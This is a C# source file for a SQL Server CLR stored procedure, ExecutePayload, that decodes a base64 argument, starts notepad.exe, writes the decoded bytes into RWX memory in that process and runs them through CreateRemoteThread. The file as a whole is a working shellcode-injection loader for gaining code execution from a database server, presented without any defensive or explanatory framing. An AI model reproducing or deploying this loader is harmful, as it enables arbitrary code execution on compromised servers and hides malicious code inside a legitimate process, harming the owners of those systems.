clr_demo.cs

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;

public partial class StoredProcedures
{
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public int dwProcessId;
        public int dwThreadId;
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct STARTUPINFO
    {
        public Int32 cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public Int32 dwX;
        public Int32 dwY;
        public Int32 dwXSize;
        public Int32 dwYSize;
        public Int32 dwXCountChars;
        public Int32 dwYCountChars;
        public Int32 dwFillAttribute;
        public Int32 dwFlags;
        public Int16 wShowWindow;
        public Int16 cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CreateProcess
    (
        string Application,
        string lpCommandLine,
        IntPtr SecurityAttributes,
        IntPtr lpThreadAttributes,
        bool bHandles,
        uint CreationFlags,
        IntPtr lpEnvironment,
        string lpCurrentDirectory,
        ref STARTUPINFO lpStartup,
        out PROCESS_INFORMATION lpProcessInformation
    );

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAllocEx
    (
        IntPtr hProcess,
        IntPtr lpAddress,
        int dwSize,
        uint flAllocationType,
        uint MemoryProtection
    );

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool WriteProcessMemory
    (
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        IntPtr lpBuffer,
        int size,
        out int written
    );

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr CreateRemoteThread
    (
        IntPtr hProcess,
        IntPtr lpThreadAttributes,
        uint StackSize,
        IntPtr lpStartAddress,
        IntPtr lpParameter,
        uint dwCreationFlags,
        out IntPtr threadId
    );

    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void ExecutePayload (string arg)
    {
        SqlPipe pipe = SqlContext.Pipe;
        STARTUPINFO si = new STARTUPINFO();
        PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
        si.cb = Marshal.SizeOf(si);
        int written = 0;
        IntPtr threadid = IntPtr.Zero;

        var bytes = Convert.FromBase64String(arg);

        if (!CreateProcess("C:\\Windows\\System32\\notepad.exe", null, IntPtr.Zero, IntPtr.Zero, true, 0, IntPtr.Zero, null, ref si, out pi))
        {
            pipe.Send("Failed to start process");
            return;
        }

        IntPtr buffer = Marshal.AllocHGlobal(bytes.Length);
        Marshal.Copy(bytes, 0, buffer, bytes.Length);

        IntPtr RemoteBuffer = IntPtr.Zero;
        RemoteBuffer = VirtualAllocEx(pi.hProcess, IntPtr.Zero, bytes.Length, 0x1000, 0x40);

        if(RemoteBuffer == IntPtr.Zero)
        {
            pipe.Send("Failed @ VirtualAllocEx with error : " + Marshal.GetLastWin32Error().ToString());
            return;
        }

        if (!WriteProcessMemory(pi.hProcess, RemoteBuffer, buffer, bytes.Length, out written))
        {
            pipe.Send("Failed @ WriteProcessMemory with error : " + Marshal.GetLastWin32Error().ToString());
            return;
        }

        CreateRemoteThread(pi.hProcess, IntPtr.Zero, 0, RemoteBuffer, IntPtr.Zero, 0, out threadid);
    }
}